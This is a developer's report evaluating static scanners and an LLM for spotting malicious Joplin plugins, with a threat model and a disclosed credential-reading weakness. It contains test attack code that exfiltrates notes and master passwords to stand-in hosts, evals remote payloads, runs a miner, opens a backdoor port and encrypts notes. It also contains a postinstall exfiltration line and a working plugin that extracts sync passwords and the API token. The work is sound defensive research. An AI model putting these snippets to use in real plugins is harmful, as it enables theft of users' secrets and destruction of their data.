Hi, as part of my GSoC work I ran three static analysis tools across a set of Joplin plugins to see how well each one detects malicious behavior. Here's what I found.
The Tools
CodeQL is GitHub's semantic analysis engine. It's powerful but requires writing QL queries and building a database per repo - the highest setup cost of the three.
Semgrep is a pattern-based scanner that runs YAML rules against source code. It's the easiest to plug into a CI pipeline and the fastest to get running.
Gemini 3.1 pro preview CLI is Google's AI-assisted tool. It reads the code and produces a structured security report with a risk score and verdict. No custom rules needed.
TESTINGS :
Semgrep Scan โ joplin-plugin-jarvis
No custom rules were written everything the scanner found out was on it own rules.
| File | Rule | Line | Issue |
|---|---|---|---|
src/commands/chat.ts |
Non-literal RegExp | 274 | new RegExp(nc, 'g') โ dynamic regex built from variable, vulnerable to ReDoS |
src/commands/chat.ts |
Non-literal RegExp | 274 | new RegExp(prompt_override) โ same line, second dynamic argument flagged |
src/commands/notes.ts |
Unsafe format string | 157 | console.debug(\Skipping note ${noteId}`)` โ variable in log string |
src/models/models.ts |
Unsafe format string | 726 | console.info(\Jarvis: Loaded ${this.embeddings.length}...`)` โ variable in log string |
src/research/papers.ts |
Unsafe format string | 296 | console.debug(\Error processing paper ${i}`)` โ variable in log string |
src/research/wikipedia.ts |
Unsafe format string | 169 | console.debug(\Error processing Wikipedia page ${i}`)` โ variable in log string |
src/utils.ts |
Non-literal RegExp | 182 | new RegExp(patterns.join(''), 'is') โ dynamic regex from joined array, vulnerable to ReDoS |
OBSERVATION :
The "Unsafe format string" Findings are 100% false positives particaularly caused by javascript.lang.security.audit.unsafe-formatstring.unsafe-formatstring rules excluding them removed this alert.
The "Non-literal RegExp" makes the plugin vulnerable to ReDoS attacks, but that is also not something we are looking for in the plugin. This one is caused by the javascript.lang.security.audit.detect-non-literal-regexp.detect-non-literal-regexp rules.
After excluding both of these rules I ran the test again on plugin-conflict-resolution, but I added custom test malicious code on it :
| File | Rule | Line | Issue |
|---|---|---|---|
src/vulnerabilities.ts |
react-insecure-request |
17 | Unencrypted request over HTTP detected (axios.get('[http://malicious.com/code.js](http://malicious.com/code.js)')). |
src/vulnerabilities.ts |
eval-detected |
18 | Detected the use of eval(). May be a code injection vulnerability. |
src/vulnerabilities.ts |
react-insecure-request |
27 | Unencrypted request over HTTP detected (fetch('[http://malicious.com/steal-db](http://malicious.com/steal-db)')). |
src/vulnerabilities.ts |
react-insecure-request |
43 | Unencrypted request over HTTP detected (axios.post('[http://malicious.com/steal-notes](http://malicious.com/steal-notes)')). |
src/vulnerabilities.ts |
weak-symmetric-mode |
49 | Weak cryptographic mode detected (createCipheriv('aes-256-cbc')). Recommend AES-256-GCM. |
src/vulnerabilities.ts |
react-insecure-request |
68 | Unencrypted request over HTTP detected (fetch('[http://malicious.com/exfiltrate-export](http://malicious.com/exfiltrate-export)')). |
The scanner is still running on pure self rules, It did catch few of the things which it should catch but missed many. Here is the list of the things he missed :
| Threat Category | Code / Attack Mechanism | Scanner Status | Why it happened |
|---|---|---|---|
| Data Exfiltration | fetch() / axios to malicious.com |
Flagged by react-insecure-request. The scanner correctly identified unauthorized HTTP network traffic. |
|
| Remote Code Execution | eval(remoteCode.data) |
Flagged by eval-detected. The scanner knows that executing dynamic strings is a massive security risk. |
|
| System Command Execution | child_process.exec('curl... bash') |
Default Node.js rulesets ignore this because legitimate backend web servers use it all the time. | |
| Destructive File Access | fs.readFileSync & fsExtra.removeSync |
Reading and deleting files is standard Node.js behavior. The scanner doesn't know plugins shouldn't do this to system folders. | |
| Network Backdoor | net.createServer(...) |
Standard Node web apps create servers, so the tool assumes it is safe behavior. | |
| Joplin API: Ransomware | joplin.data.put (encrypting existing notes) |
The scanner has no knowledge of Joplin's custom API or what joplin.data.put does. |
|
| Joplin API: Malicious Interop | joplin.interop.registerExportModule |
The scanner is completely blind to Joplin-specific plugin architecture and data-passing methods. |
These observation shows exactly 2 things :
-
Semgrep is completely unaware of what the Joplin API's are.
-
Semgrep is completely unaware of that the code he is scanning is of a plugin. It is written in ts/js but it should not do everything that a standard node.js code does like -
fs.readFileSync&fsExtra.removeSync(reading and deleting files) ,child_process.exec('curl... bash')(run system command), etc. But even if they do so for a good reason, it should be flagged once so the human reviewer can check whats it actually doing.
CodeQLScan โ joplin-plugin-jarvis
Similarly for CodeQL no custom rules were written it is doing exactly what it is made to do
| File | Rule | Line | Issue |
|---|---|---|---|
models/openai.ts |
Incomplete URL substring sanitization | 19 | 'azure.com' can be anywhere in the URL, and arbitrary hosts may come before or after it. |
models/openai.ts |
Incomplete URL substring sanitization | 26 | 'api.anthropic.com' can be anywhere in the URL, and arbitrary hosts may come before or after it. |
utils.ts |
Bad HTML filtering regexp | 374 | This regular expression does not match script end tags like </script>. |
research/pubmed.ts |
Double escaping or unescaping | 381 | This replacement may produce & characters that are double-unescaped. |
research/wikipedia.ts |
Incomplete multi-character sanitization | 125 | This string may still contain <script, which may cause an HTML element injection vulnerability. |
utils.ts |
Incomplete multi-character sanitization | 373 | This string may still contain <style, which may cause an HTML element injection vulnerability. |
utils.ts |
Incomplete multi-character sanitization | 373 | This string may still contain <script, which may cause an HTML element injection vulnerability. |
RESULT : Keeping it short, CodeQL gave better findings than Semgrep. But every result it gave except the model/ folder were XSS, which is explicitly stated by laurent that we are not looking for.
The two findings in the model/ folder were of SSRF which can be usefull as a user can trick the app by adding 'azure.com' and 'api.anthropic.com' in a custom malicious url.
Though it is not something particularly "Malicious" in the Jarvis plugin so not usefull for us.
After excluding the XSS and SSRF rules from the CodeQl original rules, I ran the test on plugin-conflict-resolution, but with added custom test malicious code on it :
| File | Vulnerability | Line | Issue |
|---|---|---|---|
lib/codemirror/mode/markdown/markdown.js |
Inefficient regular expression | 549 | This part of the regular expression may cause exponential backtracking on strings starting with 'a -=' and containing many repetitions of '= -='. |
vulnerabilities.ts |
Download of sensitive file through insecure connection | 17 | Download of sensitive file from HTTP source. |
"Inefficient regular expression" is also a ReDoS case which we are not actually looking for.
Hence, out of all the added code, CodeQl falgged :
| Threat Category | Code / Attack Mechanism | CodeQL Status | Why it happened |
|---|---|---|---|
| Data Exfiltration | fetch() / axios to malicious.com |
CodeQL did not recognize the outgoing POST/GET requests as unauthorized data leaks. | |
| Remote Code Execution | axios.get + eval(remoteCode.data) |
Flagged as "Download of sensitive file through insecure connection". CodeQL caught the dangerous HTTP download, though it ignored the eval() itself. |
|
| System Command Execution | child_process.exec('curl... bash') |
Default Node.js rulesets ignore this because legitimate backend web servers use it all the time. | |
| Destructive File Access | fs.readFileSync & fsExtra.removeSync |
Reading and deleting files is standard Node.js behavior. The scanner doesn't know plugins shouldn't do this to system folders. | |
| Network Backdoor | net.createServer(...) |
Standard Node web apps create servers, so the tool assumes it is safe behavior. | |
| Joplin API: Ransomware | joplin.data.put (encrypting existing notes) |
The scanner has no knowledge of Joplin's custom API or what joplin.data.put does. |
|
| Joplin API: Malicious Interop | joplin.interop.registerExportModule |
The scanner is completely blind to Joplin-specific plugin architecture and data-passing methods. |
These observation also shows exactly 2 things :
-
CodeQl is completely unaware of what the Joplin API's are.
-
CodeQl is completely unware of that the code he is scanning is of a plugin and should not do everything that a normal TS/JS code should do
Further architecture analysis :
Any Joplin plugin can call joplin.settings.globalValues() with no restrictions and retrieve all sync credentials, the E2E master password, and the API token , using only the official plugin API, with zero exploits or sandbox escapes.
import joplin from "api";
joplin.plugins.register({
onStart: async function () {
const result = joplin.settings.globalValues([
"sync.5.password",
"sync.6.password",
"sync.8.password",
"sync.9.password",
"sync.10.password",
"encryption.masterPassword",
"api.token",
"encryption.passwordCache",
]);
joplin.data.post(["notes"], null, {
title: "test note for hacker",
body: JSON.stringify(await result),
});
},
});
Additionally, the dev can get access to both the security key and master password :
First I used joplin.data.get(['master_keys']) which is a defined method to get the master_keys, but this was blocked by a regex filter that does not allow "_" in it :
for (const p of path) {
if (!this.pathSegmentRegex_.test(p)) {
throw new Error(`Path segments must only contain lowercase letters and digits: ${JSON.stringify(path)}`);
}
}
So, I used "syncInfoCache" and it worked and I got the key + master_password.
Joplin settings and plugins I believe currently work on the thinking that "If a user has installed a plugin he trust it", i.e the plugin gets access to all the settings defined. Since, we are moving from a trust-by-default to a review-by-default model, It will be good to have a flag about this specific bypass.
A plugin can read the secret and pipe it down through a network request silently without the user ever even knowing or it can even read both key and password of the user.
Update to threat model :
What it is: The plugin attempts to read or extract the application's Master Password, Master Encryption Keys, or Sync Target Credentials regardless of the API path used. Because plugins operate in a trusted environment, extracting these assets constitutes a compromise of the user's privacy and must flagged for review.
Known Attack Vectors:
-
Calling
joplin.settings.globalValueorglobalValuesexplicitly targeting "syncInfoCache" , "encryption.masterPassword" , "sync.*.password", "api.token" , "encryption.cachedPpk" , "encryption.passwordCache", should be once flagged for review. -
Additionally if the data is read and piped down to a network request, saved silently to a note, written to the local file system, passed to a system command (child_process), or injected into an external webview, it should be marked as critical and a must-review case.
-
If both "encryption.masterPassword" and "encryption key" are being fetched by a plugin it should also be marked for a review.
Threat Model :
All of the above observation shows the exact need of writing custom rules for the tool and defining a threat model, using which the tools would know what we have to detect.
Since, human review is the mandatory part of the pipeline we have to write a threat model that covers both "This is bad" and "This may be bad" scenarios, so the reviewer know what he has to review.
Tools by themselves do not know what a person want to see in there code flagged out. Using the custom rules / threat model, we will tell the tool, we want to see these things flagged out so that the human reviewer can read the report in the issue and have a quick check on it.
Following is the threat model that I have defined till now with the exact reason why each of the things should be flagged :
Phase 1: Critical Threats
-
Dynamic Code Execution: The plugin downloads a hidden script from the internet and executes it dynamically. Attack Vectors: Usage of
eval()or bypassingjoplin.requireto use nativerequire('child_process')with remote payloads. -
Secret & Key Theft: The plugin attempts to read the application's Master Password, Encryption Keys, or Sync Credentials. Attack Vectors: Calling
joplin.settings.globalValue(s)targetingsyncInfoCache,encryption.masterPassword,encryption.cachedPpk,encryption.passwordCache,sync.*.password,sync.*.auth,sync.*.context,sync.5.username,sync.6.username,sync.9.username,sync.10.username,sync.10.userEmail,sync.userId, orclientId. This is critical if the data is piped to a network request, written to disk, passed tochild_process, or injected into an external webview. -
Electron Main Process Takeover: Gaining direct access to the main Electron process to control the app window or bypass renderer restrictions. Attack Vectors: Any import or requirement of
@electron/remote. -
Archive Extraction Attack : Using maliciously crafted zip files to overwrite sensitive files outside the intended directory, silently replacing
database.sqliteor config files. Attack Vectors: Usage ofjoplin.fs.archiveExtract()where either argument originates from user input or a remotely fetched source. This should be flagged for a reviewer to see what the zip extraction is actually doing? -
Mass Data Destruction: Iterating through notes or folders and permanently destroying the user's database. Attack Vectors:
joplin.data.delete()appearing inside a loop iterating overjoplin.data.get(['notes'])orjoplin.data.get(['folders']). LLM should check the purpose of the iteration and report it respectively. -
Keylogging & Silent Surveillance: Silently monitoring everything a user reads or types in real-time and exfiltrating it. Attack Vectors:
onNoteContentChangeoronNoteChangecombined directly with network requests (fetch,axios). -
Unauthorized FS Access & Self-Modification: Bypassing official APIs to read/rewrite core configs (
database.sqlite), or rewriting its own source files after installation to swap code for malware. Attack Vectors: Usage of nativefsorjoplin.require('fs-extra')targeting__dirname + '/index.js'or~/.config/joplin-desktop. -
Network Backdoors: Opening a listening port on the user's local network. Attack Vectors: Usage of
net.createServer(). -
Clipboard Hijacking: Rapidly reading the clipboard to find sensitive data + swapping it. Attack Vectors: Background loops calling
joplin.clipboard.readText()andjoplin.clipboard.writeText(). -
Native Binary & Cryptojacking: Dynamically downloading/unpacking compiled binaries, spawning miners, or using Web Workers for crypto-mining. Attack Vectors: Exploiting Node.js integration via
child_processor hiddenBrowserWindows. -
Native Module Imports : Bypassing the
joplin.require()API to gain full host machine access. Attack Vectors: Direct imports ofchild_process,net,os,dgramviarequire(),window.require(), or TypeScriptimportstatements. -
Silent Data Persistence : Storing execution commands or exfiltrated data invisibly. Attack Vectors: Reading
joplin.data.userDataSet()and passing the result directly toeval(),exec(), orfetch().
Phase 2: Dual-Use Data Flows
-
Command Execution: Running terminal commands via
child_process. Attack Vectors: Data flowing into shell execution. The reviewer must verify if it is a legitimate tool or a malicious script. -
Data Exfiltration: Using
joplin.data.getto bulk-read notes and piping that data intofetch()oraxios. Attack Vectors: Note data flowing to network. The reviewer must verify the destination URL. -
Mass Encryption / Ransomware: A flow combining note reading, cryptographic modules, and overwriting the originals. Attack Vectors:
joplin.data.getpiped tojoplin.data.putviacrypto. The reviewer must verify if this is just a encryption feature or not. -
Silent Backup Hijacking: Registering a custom export format while secretly piping the plaintext data to an external server. Attack Vectors:
fetch()or network requests inside ajoplin.interop.registerExportModulecallback. -
Malicious Import Module: Registering a custom import format that injects malicious notes, corrupts the database, or drops payload files. Attack Vectors: Malicious payloads inside a
joplin.interop.registerImportModulecallback. -
Remote External Webviews: Creating a UI panel but setting the source to an external URL. Attack Vectors:
<iframe src="...">in panel HTML. The reviewer must verify the trusted status of the external service.
False Positive:
Several Phase 2 items are dual-use by nature and will flag legitimate plugins (e.g., child_process for Python integrations, fetch + data.get). This is intentional. Phase 2 exists precisely because human review is mandatory. The LLM scanner is prompted to consider context before flagging, reducing noise compared to rule-based tools.
Note : This threat model mostly contain of data flows, that is why now it is not possible to define any custom rules in semgrep for this, I have given a small study at last of the SAST section to specifically test why semgrep cannot be used anymore
Also few new threats were added after the initial testings so the test below are done on a little less threat model coverage
Here is the report CodeQl gnerated on plugin-conflict-resolution with custom malicious code :
| Vulnerability / Rule | Description | Severity | File | Position (Line:Col) |
|---|---|---|---|---|
| Unauthorized Native Module Bypasses | Detects direct imports of 'child_process', bypassing the safe 'joplin.require' method. | warning | /vulnerabilities.ts |
2:8 - 2:25 |
| Network Backdoors | Detects local servers being spun up which may indicate a backdoor. | warning | /vulnerabilities.ts |
30:20 - 33:6 |
| Data Exfiltration (Notes to Network) | Detects Joplin notes data flowing to external network requests. | warning | /vulnerabilities.ts |
43:58 - 43:62 |
| Direct File System / Sandbox Escape | Detects hardcoded sensitive paths or traversals flowing into file system APIs. | warning | /vulnerabilities.ts |
26:36 - 26:41 |
| Secret and Key Theft | Detects sensitive environment variables or settings data exfiltrated via network requests. | warning | /vulnerabilities.ts |
22:17 - 22:65 |
CodeQL generated a good report + also was able to catch cross file code and gave exact lines to look for. The threat model seems to work great as it enhanced the codeQL result a lot :
| Threat Category | Code / Attack Mechanism | Status |
|---|---|---|
| Data Exfiltration | fetch() / axios to malicious.com |
|
| Remote Code Execution | axios.get + eval(remoteCode.data) |
|
| System Command Execution | child_process.exec('curl... bash') |
|
| Destructive File Access | fs.readFileSync & fsExtra.removeSync |
|
| Network Backdoor | net.createServer(...) |
|
| Joplin API: Ransomware | joplin.data.put (encrypting existing notes) |
|
| Joplin API: Malicious Interop | joplin.interop.registerExportModule |
(It returned clean for jarvis)
RESULT :
CodeQl gave good result when was defined what he has to look for. Though as earlier seen Codeql was not able to identify most of the things we want to see without the custom rules, this means that it is now bound to the "threat model" to generate the report so the only things which we will mostly see in the report are of the "threat model", leaving a huge Zero-Day Blind Spot.
LLM as a scanner :
LLM would be a great tool to use here, as the main problem arising with tools are lack of context of what actually a "joplin plugin api" is and the need for defining a "threat model" to write custom rules for.
As many joplin plugins are made by the community developers, although the "threat model" can be defined, but in future new and new things that a reviewer would want to see in the report will arise.
LLM is not bound to any rule or threat model, although "threat mode" will be prompted, LLM are also actively good enough to report zero day malicious code.
The scan result from gemini 3.1 pro preview with threat model defined on joplin-plugin-jarvis :
The scan result from gemini 3.1 pro preview with threat model defined on plugin-conflict-resolution with custom malicious code :
| Threat Category | Code / Attack Mechanism | LLM Status |
|---|---|---|
| Data Exfiltration | joplin.data.get -> axios.post() |
|
| Remote Code Execution | axios.get() + eval() |
|
| System Command Execution | child_process (curl... bash) |
|
| Secret & Key Theft | process.env -> fetch() |
|
| Sandbox Escape / File Access | fs (SQLite) / fs-extra (absolute) |
|
| Network Backdoor | net.createServer().listen(1337) |
|
| Joplin API: Ransomware | Read -> crypto.createCipheriv -> Put |
|
| Joplin API: Malicious Interop | registerExportModule -> fetch() |
The "threat model" seems to be working correctly, the well known joplin-plugin-jarvis which is not malicious was not flagged malicious, the use of fetch() after joplin.notes.get was flagged so a human reviewer can just check if there is nothing wrong.
Additionally, the LLM is not bound to only the threat model. It effectively looks the code and see if there is something that should be flagged, similar to the threat model defined.
More observations :
Why these tests were done?
To verify is the threat model generating any noise? If yes is it usefull and should be added in the threat model?
Additionally, LLM was used to scan + see if there is any flow that a plugin use which should be added to the threat model.
The most popular 4 plugins all passed the LLM and CodeQl scan with a clean result :
Note : The LLM was free to also look for similar malicious code pattern as the threat model
joplin-inline-todo
Clean
joplin-rich-markdown
Clean
plugin-templates
Clean
plugin-yesyoukan
Clean
CodeQl produced a little noise on plugin-templates :
| Issue / Rule | Severity | File Location | Description |
|---|---|---|---|
| Useless regular-expression character escape | Error | /parser.ts (Line 211, Col 48, Col 63) |
The escape sequence \S is equivalent to just S. Prepending a backslash to an ordinary character in a string does not have any effect. |
This is a code quality finding due to the "*useless-regexp-character-escape*" rule, which is now excluded from the rules.
Tests :
joplin-math-mode
Clean
joplin-note-tabs
Clean
joplin-plugin-extra-editor-settings
Clean
joplin-plugin-quick-links
Clean
joplin-inline-tags-plugin
Clean
joplin-plugin-combine-notes
Clean
joplin-plugin-diff-tool
Clean
joplin-plugin-table-formatter
Clean
New updates to threat model after these testings :
-
Self-Modifying Code / Silent Payloads : What it is: The plugin uses
fsorfs-extrato rewrite its own source files (e.g., overwriting__dirname + '/index.js') after installation to swap code for malware, bypassing initial CI scans. -
Cryptojacking / Resource Theft : What it is: Exploiting Node.js integration to use
child_processto spawn native mining binaries , or utilizing Web Workers in the hiddenBrowserWindowto run crypto-miners in the background.
Now I had all the rules written. I made a file containing dummy code of all the rule senarios to check out how both codeql and LLM would perform :
import joplin from 'api';
import * as child_process from 'child_process';
import * as net from 'net';
import * as crypto from 'crypto';
const fs = joplin.require("fs-extra");
export async function codeql_test_dynamic_code_execution() {
const response = await fetch('https://example.com/payload.js');
const payload = await response.text();
eval(payload);
}
export async function codeql_test_secret_theft() {
const masterPassword = await joplin.settings.globalValue('encryption.masterPassword');
const syncCache = await joplin.settings.globalValue('syncInfoCache');
await fetch('https://example.com/exfiltrate', {
method: 'POST',
body: JSON.stringify({ p: masterPassword, s: syncCache })
});
}
export async function codeql_test_unauthorized_fs_access() {
const pluginDir = __dirname;
const targetFile = `${pluginDir}/index.js`;
fs.writeFileSync(targetFile, "console.log('malware swapped');");
}
export async function codeql_test_network_backdoors() {
const server = net.createServer((c) => {
c.write('backdoor active\r\n');
});
server.listen(8124);
}
export async function codeql_test_clipboard_hijacking() {
const clipContent = await joplin.clipboard.readText();
if (clipContent.includes('wallet')) {
await joplin.clipboard.writeText('attacker_wallet_address');
}
}
export async function codeql_test_cryptojacking() {
child_process.exec('xmrig -o pool.minexmr.com:4444 -u wallet_addr');
}
export async function codeql_test_command_execution() {
const userCmd = "ls -la";
child_process.exec(userCmd);
}
export async function codeql_test_data_exfiltration() {
const notes = await joplin.data.get(['notes']);
await fetch('https://example.com/sync', {
method: 'POST',
body: JSON.stringify(notes)
});
}
export async function codeql_test_mass_encryption() {
const notes = await joplin.data.get(['notes']);
for (const note of notes.items) {
const cipher = crypto.createCipheriv('aes-256-cbc', 'key', 'iv');
let encrypted = cipher.update(note.body, 'utf8', 'hex');
encrypted += cipher.final('hex');
await joplin.data.put(['notes', note.id], null, { body: encrypted });
}
}
export async function codeql_test_backup_hijacking() {
await joplin.interop.registerExportModule({
format: 'custom',
description: 'Custom Export',
target: fs.Directory,
isNoteArchive: false,
onInit: async (context: any) => {
const data = context.exportData;
await fetch('https://example.com/steal_backup', { method: 'POST', body: data });
},
onProcessItem: async (context: any, itemType: number, item: any) => {},
onProcessResource: async (context: any, resource: any, filePath: string) => {},
onClose: async (context: any) => {}
});
}
export async function codeql_test_remote_webviews() {
const htmlContent = `<iframe src="https://example.com/remote_app"></iframe>`;
const view = await joplin.views.panels.create('panel_1');
await joplin.views.panels.setHtml(view, htmlContent);
}
Result :
| # | Threat | Phase | Maliciousness | LLM Scan | CodeQL |
|---|---|---|---|---|---|
| 1 | Dynamic Code Execution | 1 | |||
| 2 | Secret & Key Theft | 1 | |||
| 3 | Unauthorized FS / Self-Modification | 1 | |||
| 4 | Network Backdoor | 1 | |||
| 5 | Clipboard Hijacking | 1 | |||
| 6 | Cryptojacking / Binary Dropping | 1 | |||
| 7 | Command Execution | 2 | |||
| 8 | Data Exfiltration (notes โ network) | 2 | |||
| 9 | Mass Encryption / Ransomware | 2 | |||
| 10 | Silent Backup Hijacking | 2 | |||
| 11 | Remote Webview Scripts | 2 |
Originally, only LLM caught all the threats. Codeql rule were extreamly useless and caught only (3/11) threats. Several changes had to be done to make Codeql catch all the threats.
Trade offs : CodeQl is not good enough to catch complex data flows like how data was extracted and converted to an object and then used JSON.stringify on. Here codeql actually lost the track of the data and did not knew the new object contains the data we are following.
What had to be done to solve it? : Several new rules were added and old rules were updated to simply check :
- does
data.get()andfetchappear in same function? - does
data.get()+ crypto call +joplin.data.put()happens in the same file? fetch()or file write inside aregisterExportModulecallback
etc....
Though these rules solved the problem right now, I am sure there are still a lot of blind spots which are left in CodeQl.
Additionally, codeql also caught these extra things :
| Threat / Finding | What it is |
|---|---|
| Weak Cryptography (CBC mode) | The code uses an outdated encryption algorithm mode (like AES-CBC) instead of modern authenticated encryption (like AES-GCM). |
| Insecure Network Traffic (HTTP) | The plugin is making network requests (fetching data or sending user info) over plain http:// rather than secure https://. |
| ReDoS (Inefficient Regex) | Regular Expression Denial of Service. The code contains a poorly structured regex pattern that requires exponential time to evaluate certain complex strings. |
All of these were code quality noise.
Additional test for Semgrep :
Click to expand
Ran semgrep on same test file :
| Rule ID / Finding | Description / Threat |
|---|---|
eval-detected |
Detected the use of eval(). Potential code injection vulnerability. |
joplin-plugin-dynamic-code-execution |
Remote or dynamically-loaded data flows into dynamic code execution (RCE). |
joplin-plugin-master-password-access |
MANUAL REVIEW REQUIRED: Plugin reads the master encryption password. |
joplin-plugin-sync-cache-access |
MANUAL REVIEW REQUIRED: Plugin reads the sync info cache (encryption keys/sync metadata). |
joplin-plugin-secret-key-theft |
Sensitive Joplin credentials flowing to a network/file/process/IPC sink. |
joplin-plugin-unauthorized-fs-write |
A path derived from __dirname flows to a file write (Self-modification). |
joplin-plugin-network-backdoor |
A server created via createServer() flows to .listen() (Network port opened). |
joplin-plugin-clipboard-hijacking |
Data flows into clipboard.writeText() (Clipboard hijacking). |
joplin-plugin-command-execution |
Data flows into shell command execution. Requires review. |
joplin-plugin-cryptojacking |
A string matching known miners/mining pools flows into child_process (Cryptojacking). |
joplin-plugin-command-execution |
Data flows into shell command execution. Requires review. |
joplin-plugin-data-exfiltration |
Joplin note data read via joplin.data.get() flows to a network request. |
javascript.crypto.weak-symmetric-mode |
Detected the use of a weak cryptographic mode (aes-256-cbc). |
javascript.crypto.symmetric-hardcoded-key |
A secret is hard-coded in the application. |
joplin-plugin-ransomware |
Ransomware pattern: reads notes, encrypts them, and writes them back. |
joplin-plugin-ransomware-taint |
Encrypted data flows into joplin.data.put(). |
joplin-plugin-backup-hijacking |
Network or file write detected inside a registerExportModule() callback. |
joplin-plugin-remote-webview |
An external URL flows into a Joplin webview via setHtml(). |
Semgrep caught everything.
How ? : Specifically, the rules written for it were not dynamic neither flow tracking, most of them were direct, like if you see eval report as it is a AST matching scanner. Since, the file was specifically written for testing it caught everything usefull. But using the same ruleset on normal pluggin will cause huge amount of noise. For example using semgrep rule on Jarvis :
| File | Lines | What the code is actually doing |
|---|---|---|
src/chatPanel.ts |
94 | Building the HTML for the main Jarvis chat input UI (<div class="jarvis-chat-panel">). |
src/commands/ask.ts |
30, 97, 127 | Building HTML forms for the "Ask Jarvis" and "Edit with Jarvis" popup dialogs. |
src/commands/research.ts |
52 | Building the HTML form for the "Research with Jarvis" dialog. |
src/models/models.ts |
1317 | Injecting local CSS styles (<style>) for a preview window. |
src/ux/modelManagement.ts |
435 | Calling a helper function build_dialog_html to render the model management UI. |
src/ux/panel.ts |
27, 51, 91 | Building the HTML for the sidebar panels (showing related notes, search boxes, and progress bars). |
They all are useless noises.
Similarly calling the codeql new rules on jarvis gave no noise.
Conclusion :
Since, the threat model is more of a data flow kind now, AST scanner tools like semgrep , sonarQube (primary code quality scanner), etc does not have ability to scan them. Even if extra complex peice of custom rules are written, the main trade off will be that they will be doing something they are not designed for, hence a huge blind spot will always be left for the senarious which are not kept in mind while writting the rules + they will produce a lot of noise on normal plugins too.
The tool which stand chance was CodeQl, after several tests I came to realize the same things as the above tools, even though it has ability of taint tracking, there will always be blind spots for the senarious not taken in mind while writting the rules.
The LLM performed well in all of these cases, not only it was accurate at scanning.. It seldomly warned me about new things which are potential warning too in the plugins.
I still beleive LLM would be a great call for use in this pipeline.
SCA TOOL (socket.dev) :
Snyk , Semgrep SCA and npm audit are just general CVE database scanning tools, as of this pipeline we need something which can actually check if the package is malicious or not.
The tool which is popular for this use case is socket dev.
The first thing I did was running the socket scan on top 10 plugins from the plugin website of joplin.
Why? : To determine the noise level and also previously, I have tested socket.dev using custom malicious postinstall etc but it did not gave any result because it works on official npm published package only.
One thing to keep in mind while veiwing these result is that there are 3 tier in socket.dev low, warn and critical. I have completely filtered out the low findings.
Here are the result on the top 10 plugins :
1. joplin-inline-tags-plugin :
| Package | Version | Alert Type | Severity (Policy) |
|---|---|---|---|
fast-xml-parser |
4.2.5 | criticalCVE |
warn |
form-data |
2.3.3 | criticalCVE |
warn |
form-data |
2.5.1 | criticalCVE |
warn |
form-data |
4.0.0 | criticalCVE |
warn |
entities |
4.5.0 | obfuscatedFile |
warn |
immer |
7.0.15 | criticalCVE |
warn |
2. joplin-inline-todo :
| Package | Version | Alert Type | Severity (Policy) |
|---|---|---|---|
entities |
4.5.0 | obfuscatedFile |
warn |
handlebars |
4.7.8 | criticalCVE |
warn |
3. joplin-math-mode :
| Package | Version | Alert Type | Severity (Policy) |
|---|---|---|---|
| - | - | No alerts detected | - |
The scan completed successfully and detected 0 alerts. The alerts object is entirely empty.
4. joplin-plugin-combine-notes :
| Package | Version | Alert Type | Severity (Policy) |
|---|---|---|---|
form-data |
2.3.3 | criticalCVE |
warn |
form-data |
4.0.0 | criticalCVE |
warn |
form-data |
2.5.1 | criticalCVE |
warn |
entities |
4.5.0 | obfuscatedFile |
warn |
immer |
7.0.15 | criticalCVE |
warn |
5. joplin-plugin-diff-tool :
| Package | Version | Alert Type | Severity (Policy) |
|---|---|---|---|
entities |
4.5.0 | obfuscatedFile |
warn |
6. joplin-plugin-extra-editor-settings :
| Package | Version | Alert Type | Severity (Policy) |
|---|---|---|---|
entities |
4.5.0 | obfuscatedFile |
warn |
form-data |
4.0.1 | criticalCVE |
warn |
7. joplin-plugin-jarvis :
| Package | Version | Alert Type | Severity (Policy) |
|---|---|---|---|
entities |
4.5.0 | obfuscatedFile |
warn |
markdown-it |
14.2.0 | obfuscatedFile |
warn |
markdown-it |
14.2.0 | obfuscatedFile |
warn |
8. plugin-templates :
| Package | Version | Alert Type | Severity (Policy) |
|---|---|---|---|
handlebars |
4.7.8 | criticalCVE |
warn |
9. plugin-yesyoukan :
| Package | Version | Alert Type | Severity (Policy) |
|---|---|---|---|
entities |
4.5.0 | obfuscatedFile |
warn |
10. joplin-plugin-quick-links :
| Package | Version | Alert Type | Severity (Policy) |
|---|---|---|---|
fast-xml-parser |
4.2.5 | criticalCVE |
warn |
form-data |
2.3.3 | criticalCVE |
warn |
form-data |
4.0.0 | criticalCVE |
warn |
form-data |
2.5.1 | criticalCVE |
warn |
entities |
4.5.0 | obfuscatedFile |
warn |
immer |
7.0.15 | criticalCVE |
warn |
Observation :
The result was full of false-positives, every result which was generated was a false positive.
entities : obfuscatedFile Appeared in 8/10 plugins - This is a machine-generated HTML character decoding lookup table. Socket.dev cannot distinguish between intentionally obfuscated malware and auto-generated data tables.
form-data : criticalCVE Appeared in 5/10 plugins - it is a dependency pulled in through @joplin/* packages.
Is there a way to silent it? : The only possible ways are either silent all packages one by one that can be pulled (not feasible) another is to add CVE and obfuscatedFile in ignored list, but then we won't get usefull info too (not feasible)
markdown-it : obfuscatedFile Flagged only in Jarvis - These are standard minified browser bundles. False positive
immer, fast-xml-parser , handlebars : criticalCVE - Known CVEs in older versions of packages. Also, these are not Joplin-specific and are of warn category. This is not something we are looking for neither they do us any good, also few of them are from @joplin/*.
Summary
| Plugin | Alerts | Real Threats | False Positives |
|---|---|---|---|
| joplin-inline-tags-plugin | 6 | 0 | 6 |
| joplin-inline-todo | 2 | 0 | 2 |
| joplin-math-mode | 0 | 0 | 0 |
| joplin-plugin-combine-notes | 5 | 0 | 5 |
| joplin-plugin-diff-tool | 1 | 0 | 1 |
| joplin-plugin-extra-editor-settings | 2 | 0 | 2 |
| joplin-plugin-jarvis | 3 | 0 | 3 |
| plugin-templates | 1 | 0 | 1 |
| plugin-yesyoukan | 1 | 0 | 1 |
| joplin-plugin-quick-links | 6 | 0 | 6 |
| Total | 27 | 0 | 27 |
Then I ran the test again on Jarvis with a new custom dependency :
"akshajrawat.utils": "^1.0.1",
that contained :
"postinstall": "node -e \"require('https').get('https://example.com/collect?k='+process.env.HOME+'&u='+process.env.USERNAME)\""
No new result was found.
Conclusion :
Every single alert across all 10 plugins is either a CVE in a trusted Joplin dependency or a false positive obfuscation flag on generated/minified files. A maintainer reading these reports would find zero actionable information.
Socket.dev has no @joplin/* filter and surfaces the same Joplin-owned CVEs on every plugin.
As shown in the proposal test , a purpose-built malicious postinstall script was completely missed + the older tests showed the same result how these custom packages were missed.
What we can do :
Not integrate Socket.dev. The LLM SCA summary (install scripts + non-registry sources + direct dependency typosquatting check) covers the actual threat surface more accurately with significantly less noise :
1. Flag: Install Scripts Detected (postinstall, preinstall)
